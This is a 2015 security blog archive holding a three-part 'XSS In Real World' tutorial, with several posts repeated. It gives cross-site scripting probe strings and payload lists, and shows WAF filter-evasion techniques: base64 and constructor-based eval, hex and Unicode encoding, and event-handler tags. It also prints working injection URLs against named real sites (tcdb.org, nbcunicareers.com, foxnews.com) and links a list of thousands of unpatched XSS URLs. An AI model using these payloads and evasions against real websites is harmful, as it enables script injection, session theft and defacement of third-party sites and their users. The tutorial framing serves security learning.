Let's make a fake XSS POC on popular website like www.twitter.com:
Open JavaScript console and enter alert(document.domain):
Close the console, make a screenshot. Profit :)
Friday, April 3, 2015
XSS In Real World - Part 3 (Inline JavaScript Injection)
XSS In Real World - Part 3 (Inline JavaScript Injection)
Update: You can get the tutorial in PDF format here: 01-04-15_XSS_Tutorial_Korznikov_Alexander.pdf
This is part 3 of XSS in Real World tutorial.
Part 2 of XSS in Real World tutorial
Part 1 of XSS in Real World tutorial
The interesting thing, that this type of injection can be found on popular websites.
Even if there a sanitation of tags, and equal character – XSS is possible.
If the logic of web-site (no matter if it’s server-side or client-side), reflects user’s input in web-page’s javascript, we can use it for nasty purposes :)
Simple example:
We have URL: “http://www.example.com/?id=1&style=blue”
The context will be: var site.style = ‘’blue’
This will throw an javascript exception: SyntaxError: unterminated string literal
Model:
\string\trash\string\
‘’ blue ‘ //unclosed string
In case if ID parameter is handled by client-side, and reflected in context:
var site.id = 1
Injected payload “id=1’trash” will look like:
var site.id = 1’trash
That will also throw an SyntaxError exception.
In case if our payload will look like “style=blue\”
var site.style = ‘blue\’
Again, will be SyntaxError exception, because javascript interprets \” as escaped quote.
So we can develop a noninvasive XSS locator:
‘” >trash\
single quote / double quote / space / greater sign / string / backslash
Some examples that this locator will break: //in case of no filtration
HTML Code break:
RED: Rendered as tags / BLUE: throwed out at the screen
<a href=”http://example.com/?id=1&style=’” >trash\” style=”blablabla”>
Javascript SyntaxErrors:
RED: Syntax errors
var a = “blue’” >trash\’
a=unescape(‘blue’” >trash\’)
var a = ‘blue’" >trash\’
Sometimes web-site logic will escape ’ or ” characters, so try to add to our locator \’\” >trash\ as result you may see:
var a = ‘blue\\’\\” >trash\
\’ as input will be \\’ as output, so our backslash is escaped, and quotation mark rendered.
One more thing to remember, that we can perform all mathematical operations for all objects in javascript.
For example, we can: ‘ale’+’rt’, or ‘a’ - ‘b’ or ‘a’ * ’b’. Google for more info :)
Examples of nasty javascript injections with various payloads:
var a = ‘blue’
var a = ‘blue’ - alert(‘xss’) - ‘’ //alert() will be executed
var b = [‘red’,’blue’,alert(‘xss’),’’]
var c = func(‘blue’+alert(/xss/))//) //after “//” the rest of line will be commented
Inline Javascript Real Demo.
Our second target will be www.nbcunicareers.com, XSS report date: 28/06/2014
For making our life easier we will need FireBug and Hack-Bar Firefox addons.
Entering our XSS locator (‘”>trash\) to the website’s “Find Jobs” input field:
Got us to this URL:
http://www.nbcunicareers.com/search-results?search_type=criteria&country=6&state=all&city=all&keywords='">trash\
and as response we will get:
As you can see in FireBug’s output, thrown an exception - SyntaxError: missing } after property list.
By clicking on the green URL right after the “SyntaxError”, we will get generated JavaScript source code:
As you can notice, on lines 570 and 577 the code was broken:
After server-side logic, out XSS locator looks like: ‘">trash\
So the “ and > tags are converted to HTML entities " > accordingly.
But the single quote is not converted, and only that broke the JavaScript code.
Let’s test for other useful characters () and enter this payload: ‘-a()-
Looks pretty good, characters aren’t converted and passed to generated JavaScript.
How JavaScript understands this payload? ‘ closes string, - subtracts results of a() function
So, our final payload should look like: ‘-alert(‘XSS’)-‘ and should not brake generated JavaScript execution.
pwned again :)
That’s all folks!
Like & Share :)
Alexander Korznikov.
Update: You can get the tutorial in PDF format here: 01-04-15_XSS_Tutorial_Korznikov_Alexander.pdf
This is part 3 of XSS in Real World tutorial.
Part 2 of XSS in Real World tutorial
Part 1 of XSS in Real World tutorial
The interesting thing, that this type of injection can be found on popular websites.
Even if there a sanitation of tags, and equal character – XSS is possible.
If the logic of web-site (no matter if it’s server-side or client-side), reflects user’s input in web-page’s javascript, we can use it for nasty purposes :)
Simple example:
We have URL: “http://www.example.com/?id=1&style=blue”
1. Parameter “id” is handled by Server-Side logic, checking for INTEGERIf we pass to the parameter “style” string: ‘blue //single quote
2. Parameter “style” handled by client-side javascript and reflected in this context:
var site.style = ‘blue’
The context will be: var site.style = ‘’blue’
This will throw an javascript exception: SyntaxError: unterminated string literal
Model:
\string\trash\string\
‘’ blue ‘ //unclosed string
In case if ID parameter is handled by client-side, and reflected in context:
var site.id = 1
Injected payload “id=1’trash” will look like:
var site.id = 1’trash
That will also throw an SyntaxError exception.
In case if our payload will look like “style=blue\”
var site.style = ‘blue\’
Again, will be SyntaxError exception, because javascript interprets \” as escaped quote.
So we can develop a noninvasive XSS locator:
‘” >trash\
single quote / double quote / space / greater sign / string / backslash
Some examples that this locator will break: //in case of no filtration
HTML Code break:
RED: Rendered as tags / BLUE: throwed out at the screen
<a href=”http://example.com/?id=1&style=’” >trash\” style=”blablabla”>
Javascript SyntaxErrors:
RED: Syntax errors
var a = “blue’” >trash\’
a=unescape(‘blue’” >trash\’)
var a = ‘blue’" >trash\’
Sometimes web-site logic will escape ’ or ” characters, so try to add to our locator \’\” >trash\ as result you may see:
var a = ‘blue\\’\\” >trash\
\’ as input will be \\’ as output, so our backslash is escaped, and quotation mark rendered.
One more thing to remember, that we can perform all mathematical operations for all objects in javascript.
For example, we can: ‘ale’+’rt’, or ‘a’ - ‘b’ or ‘a’ * ’b’. Google for more info :)
Examples of nasty javascript injections with various payloads:
var a = ‘blue’
var a = ‘blue’ - alert(‘xss’) - ‘’ //alert() will be executed
var b = [‘red’,’blue’,alert(‘xss’),’’]
var c = func(‘blue’+alert(/xss/))//) //after “//” the rest of line will be commented
Inline Javascript Real Demo.
Our second target will be www.nbcunicareers.com, XSS report date: 28/06/2014
For making our life easier we will need FireBug and Hack-Bar Firefox addons.
Entering our XSS locator (‘”>trash\) to the website’s “Find Jobs” input field:
Got us to this URL:
http://www.nbcunicareers.com/search-results?search_type=criteria&country=6&state=all&city=all&keywords='">trash\
and as response we will get:
As you can see in FireBug’s output, thrown an exception - SyntaxError: missing } after property list.
By clicking on the green URL right after the “SyntaxError”, we will get generated JavaScript source code:
As you can notice, on lines 570 and 577 the code was broken:
After server-side logic, out XSS locator looks like: ‘">trash\
So the “ and > tags are converted to HTML entities " > accordingly.
But the single quote is not converted, and only that broke the JavaScript code.
Let’s test for other useful characters () and enter this payload: ‘-a()-
Looks pretty good, characters aren’t converted and passed to generated JavaScript.
How JavaScript understands this payload? ‘ closes string, - subtracts results of a() function
So, our final payload should look like: ‘-alert(‘XSS’)-‘ and should not brake generated JavaScript execution.
pwned again :)
That’s all folks!
Like & Share :)
Alexander Korznikov.
Convert any string into HEX \x41\x41 bytes array
A little add-on to previous blogpost, here is a short script in python that will convert your input string to \x00\x00 bytes array:
Example:
#!/usr/bin/python from struct import pack import sys W = '\033[0m' # white (normal) G = '\033[32m' # green if not len(sys.argv[1:]): print '\n\t%sUsage: string2hex "alert()"%s\n\n\t\tWill output \'\\x61\\x6C\\x65\\x72\\x74\\x28\\x29\'\n' % (G,W) exit() b = sys.argv[1] print '%s%s%s' % (G,''.join(["\\x%02X" % ord( x ) for x in b]),W)
Example:
root@nopernik:~#
root@nopernik:~# string2hex "<script>alert()</script>"
\x3C\x73\x63\x72\x69\x70\x74\x3E\x61\x6C\x65\x72\x74\x28\x29\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E
XSS In Real World - Part 2 (WAF Filter Evasions)
XSS In Real World - Part 2 (WAF Filter Evasions)
This is part 2 of XSS in Real World tutorial.
Part 1 of XSS in Real World tutorial
What if the <script> tag is filtered out?
Some WAF evasion cheat-sheets that we can use <sCRipT> tag, but I’ve never seen this in real world.
So I don’t even try it.
Some variations:
<img src=x onerror=alert()>
<img/src=x onerror=”alert()”>
<svg onload=alert()>
<svg/onload=’alert()’>
<marquee onstart=alert()>
<div style=”width:1000px;height:1000px” onmouseover=alert()>asdfa</div>
<a onmouseover=alert()>some random text
What if alert() is filtered?
confirm()
prompt()
window[‘alert’](‘xss’)
window['ale'+'rt']('xss')
eval(window.atob('YWxlcnQoJ3hzcycp')) //decode base64 string && execute
eval(window['atob']('YWxlcnQoJ3hzcycp'))
window['e'+'v'+'a'+'l'](window['atob']('YWxlcnQoJ3hzcycp'))
Awesome evasion technique: []["filter"]["constructor"]( CODE )() //equals to eval()
So,
eval(‘alert()’) == []["filter"]["constructor"]( window['atob']('YWxlcnQoJ3hzcycp') )()
And even more evasion:
[]["fil"+"ter"]["constr"+"uctor"]( window['atob']('YWxlcnQoJ3hzcycp') )()
document.body += atob(‘PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+’) //decoded base64 == <script>alert()</script>
Some reference on []() functions:
Some security researchers go deeper, and develop tools like:
http://www.jsfuck.com/
http://patriciopalladino.com/files/hieroglyphy/
That will generate your JavaScript CODE only with []()!+ characters.
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])
Thanks to Patricio Palladino and Martin Kleppe.
So you understand string manipulation like ‘ale’+’rt’...
Will not going to explain it again :)
What if () characters are filtered?
onerror=alert; throw “xss”
“document.body += ‘string’” will append your string to the end of <body> tag.
document.body += ‘<script>alert\x28\x29</script>’ // in HEX: ‘\x28’ == ‘(‘ and ‘\x29’ == ‘)’
Or you can encode the whole string <script>alert()</script> in HEX:
document.body +=
‘\x3C\x73\x63\x72\x69\x70\x74\x3E\x61\x6C\x65\x72\x74\x28\x29\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E’
Or just use your XSS as open redirect:
document.location = ‘http://google.com’ //open redirect
Again, document.location == document[‘locati’+’on’].
Keep that in mind.
As additional reference, I recommend to read this book:
http://dl.packetstormsecurity.net/papers/bypass/WAF_Bypassing_By_RAFAYBALOCH.pdf
Simple HTML injections are easy to sanitize. Filter out tags and ‘=’ characters, and it will be painful job of finding XSS.
For example, Microsoft .NET 4 marking as Dangerous Request every request with character ‘<’ followed by almost any ASCII character. I’ve not found a way of evasion. So ‘<s’ or ‘<m’ or ‘</’ will be marked as dangerous.
So the only way to bypass it is to use ‘” onmouseover=alert()’> in case if ‘=’ is not filtered out.
Or to use inline JS injection (will be discussed in next part).
ModSecurity doesn’t know about ‘confirm()’...
Some others don’t handle Unicode encoding and/or double URL encoding.
If you can’t use ‘onload’ keyword, try ‘onload’ or ‘onl%u006fad’ or ‘onl%256fad’
Or if ‘=’ character is filtered or marked as dangerous, try ‘onload%u003d’
Fine. This is over.
In part 3, I will show you a real example of Inline JavaScript injection.
Like & Share :)
Alexander Korznikov.
This is part 2 of XSS in Real World tutorial.
Part 1 of XSS in Real World tutorial
What if the <script> tag is filtered out?
Some WAF evasion cheat-sheets that we can use <sCRipT> tag, but I’ve never seen this in real world.
So I don’t even try it.
Some variations:
<img src=x onerror=alert()>
<img/src=x onerror=”alert()”>
<svg onload=alert()>
<svg/onload=’alert()’>
<marquee onstart=alert()>
<div style=”width:1000px;height:1000px” onmouseover=alert()>asdfa</div>
<a onmouseover=alert()>some random text
What if alert() is filtered?
confirm()
prompt()
window[‘alert’](‘xss’)
window['ale'+'rt']('xss')
eval(window.atob('YWxlcnQoJ3hzcycp')) //decode base64 string && execute
eval(window['atob']('YWxlcnQoJ3hzcycp'))
window['e'+'v'+'a'+'l'](window['atob']('YWxlcnQoJ3hzcycp'))
Awesome evasion technique: []["filter"]["constructor"]( CODE )() //equals to eval()
So,
eval(‘alert()’) == []["filter"]["constructor"]( window['atob']('YWxlcnQoJ3hzcycp') )()
And even more evasion:
[]["fil"+"ter"]["constr"+"uctor"]( window['atob']('YWxlcnQoJ3hzcycp') )()
document.body += atob(‘PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+’) //decoded base64 == <script>alert()</script>
Some reference on []() functions:
false => ![]
true => !![]
undefined => [][[]]
NaN => +[![]]
0 => +[]
1 => +!+[]
2 => !+[]+!+[]
10 => [+!+[]]+[+[]]
Array => []
Number => +[]
String => []+[]
Boolean => ![]
Function => []["filter"]
eval => []["filter"]["constructor"]( CODE )()
window => []["filter"]["constructor"]("return this")()
Some security researchers go deeper, and develop tools like:
http://www.jsfuck.com/
http://patriciopalladino.com/files/hieroglyphy/
That will generate your JavaScript CODE only with []()!+ characters.
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])
Thanks to Patricio Palladino and Martin Kleppe.
So you understand string manipulation like ‘ale’+’rt’...
Will not going to explain it again :)
What if () characters are filtered?
onerror=alert; throw “xss”
“document.body += ‘string’” will append your string to the end of <body> tag.
document.body += ‘<script>alert\x28\x29</script>’ // in HEX: ‘\x28’ == ‘(‘ and ‘\x29’ == ‘)’
Or you can encode the whole string <script>alert()</script> in HEX:
document.body +=
‘\x3C\x73\x63\x72\x69\x70\x74\x3E\x61\x6C\x65\x72\x74\x28\x29\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E’
Or just use your XSS as open redirect:
document.location = ‘http://google.com’ //open redirect
Again, document.location == document[‘locati’+’on’].
Keep that in mind.
As additional reference, I recommend to read this book:
http://dl.packetstormsecurity.net/papers/bypass/WAF_Bypassing_By_RAFAYBALOCH.pdf
Simple HTML injections are easy to sanitize. Filter out tags and ‘=’ characters, and it will be painful job of finding XSS.
For example, Microsoft .NET 4 marking as Dangerous Request every request with character ‘<’ followed by almost any ASCII character. I’ve not found a way of evasion. So ‘<s’ or ‘<m’ or ‘</’ will be marked as dangerous.
So the only way to bypass it is to use ‘” onmouseover=alert()’> in case if ‘=’ is not filtered out.
Or to use inline JS injection (will be discussed in next part).
ModSecurity doesn’t know about ‘confirm()’...
Some others don’t handle Unicode encoding and/or double URL encoding.
If you can’t use ‘onload’ keyword, try ‘onload’ or ‘onl%u006fad’ or ‘onl%256fad’
Or if ‘=’ character is filtered or marked as dangerous, try ‘onload%u003d’
Fine. This is over.
In part 3, I will show you a real example of Inline JavaScript injection.
Like & Share :)
Alexander Korznikov.
Thursday, April 2, 2015
XSS In Real World - Part 1 (Simple XSS)
XSS in Real World - Part 1 (Simple XSS)
Hi there, in this tutorial series, I will try to explain how to find XSS in real world, using some interesting techniques.
All of you know, that XSS is based on some code injection. It maybe <script> tag injection, or just an ‘-alert()-‘, I will explain about that later.
What do you need to find an XSS? Simply, only browser. But, if you want to make your life easier, and find it much faster, you may use this software:
There are tons of verified XSS’s published by lot of security researchers, affecting VIP sites also.
VIP website on xssposed.org is Google PR > 6 or Alexa Rate < 50000.
So, I’ve wrote a script that grabbed all xssposed.org XSS urls, and started to filter out not interesting fields.
There were about 7500 urls.
You can download a list from here: https://ghostbin.com/paste/n6vk7/raw and filter out all you don’t need.
Real XSS (HTML Injection) Demo.
I will take a real examples of XSSs from xssposed.org that were not patched a very, very long time.
Our first target will be www.tcdb.org, XSS report dated 14/06/2008.
From that date, same XSS was reported more 3 times.
Take a look at the “search” field. Let’s enter inside some RANDOMSTRING inside <xxx> tag. Purpose of this test is to test, if there is some user input sanitation:
<xxx>RANDOMSTRING<xxx>
As output, we see our “RANDOMSTRING” without <xxx> tags.
Let’s take a look at the source: // CTRL+U in Firefox and Chrome
As you can see, there is no filtration, and our <xxx> tag passed to browser as HTML.
Purple color means that the <xxx> interpreted as tag.
Finally, we enter:
<script>alert(document.domain)</script>
One thing you should notice: there is no GET parameters in URL. In this example the POST was used.
Open Hack-Bar add-on in Firefox, and after you come to search results, press Load URL and press on checkbox: Enable Post data
Some server-side scripts, handle GET and POST requests the same way.
Let’s check it:
http://www.tcdb.org/search/index.php?query=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
In next part will discuss about WAF Filter Evasions.
Like & Share :)
Alexander Korznikov.
Hi there, in this tutorial series, I will try to explain how to find XSS in real world, using some interesting techniques.
All of you know, that XSS is based on some code injection. It maybe <script> tag injection, or just an ‘-alert()-‘, I will explain about that later.
What do you need to find an XSS? Simply, only browser. But, if you want to make your life easier, and find it much faster, you may use this software:
- Firefox Browser
- FireBug Add-on
- HackBar Add-on
- Google.
There are tons of verified XSS’s published by lot of security researchers, affecting VIP sites also.
VIP website on xssposed.org is Google PR > 6 or Alexa Rate < 50000.
So, I’ve wrote a script that grabbed all xssposed.org XSS urls, and started to filter out not interesting fields.
There were about 7500 urls.
You can download a list from here: https://ghostbin.com/paste/n6vk7/raw and filter out all you don’t need.
Real XSS (HTML Injection) Demo.
I will take a real examples of XSSs from xssposed.org that were not patched a very, very long time.
Our first target will be www.tcdb.org, XSS report dated 14/06/2008.
From that date, same XSS was reported more 3 times.
Take a look at the “search” field. Let’s enter inside some RANDOMSTRING inside <xxx> tag. Purpose of this test is to test, if there is some user input sanitation:
<xxx>RANDOMSTRING<xxx>
As output, we see our “RANDOMSTRING” without <xxx> tags.
Let’s take a look at the source: // CTRL+U in Firefox and Chrome
As you can see, there is no filtration, and our <xxx> tag passed to browser as HTML.
Purple color means that the <xxx> interpreted as tag.
Finally, we enter:
<script>alert(document.domain)</script>
One thing you should notice: there is no GET parameters in URL. In this example the POST was used.
Open Hack-Bar add-on in Firefox, and after you come to search results, press Load URL and press on checkbox: Enable Post data
Some server-side scripts, handle GET and POST requests the same way.
Let’s check it:
http://www.tcdb.org/search/index.php?query=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
In next part will discuss about WAF Filter Evasions.
Like & Share :)
Alexander Korznikov.
Awesome XSS on FOXNEWS.COM
https://www.xssposed.org/incidents/55933/
http://www.foxnews.com/search-results/search?q=',document.body.inn%00erHTML+='\x3C\x73\x76\x67\x2F\x6F\x6E\x6C\x6F\x61\x64\x3D\x61\x6C\x65\x72\x74\x28\x2F\x78\x73\x73\x70\x6F\x73\x65\x64\x2F\x29\x3E','&submit=Search&ss=fn
Subscribe to:
Posts (Atom)